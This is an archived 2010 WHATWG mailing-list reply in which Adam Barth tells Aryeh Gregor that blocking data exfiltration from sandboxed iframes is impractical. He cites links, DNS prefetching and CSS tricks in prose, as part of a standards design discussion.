- From: Adam Barth <whatwg@adambarth.com>
- Date: Mon, 25 Jan 2010 06:29:42 +0000
On Sun, Jan 24, 2010 at 8:09 PM, Aryeh Gregor <Simetrical+w3c at gmail.com> wrote: > On Sun, Jan 24, 2010 at 6:19 AM, Adam Barth <whatwg at adambarth.com> wrote: >> In general, stopping malicious content from exfiltrating data isn't >> practical. ?For example, even including a single hyperlink is often >> sufficient to exfiltrate a large amount of data. ?In user agents that >> prefetch DNS, the user doesn't even need to click on the link. > > DNS prefetching doesn't tell you anything except that someone viewed > the link, right? ?And maybe what their ISP is, in a typical case. > Including an image tells you their IP address, User-Agent, and so on. That depends what information the attacker encodes in the host name. Recall that we're imaging the attacker gets to run JavaScript within the sandbox, so, for example, the attacker can read the user agent and encode that in the host name. > How can you get any data out of a link with no DNS prefetching? ?Some > users will click the link, but not all. ?Maybe quite a lot if you > allow arbitrary CSS, of course . . . you could easily make the whole > post a link. ?But "everyone who clicks on a given post for some > reason" is still a lot less than "all viewers", which is what image > inclusions will do. Well, given that the attacker can use CSS, the attacker can make the hyperlink fill the entre content area (or at least the area occupied by the iframe). The attacker can also use the :hover selector to make interesting things happen when the user mouses over the link. The point is that stopping exfiltration is a losing battle that we shouldn't bother to play. Adam
Received on Sunday, 24 January 2010 22:29:42 UTC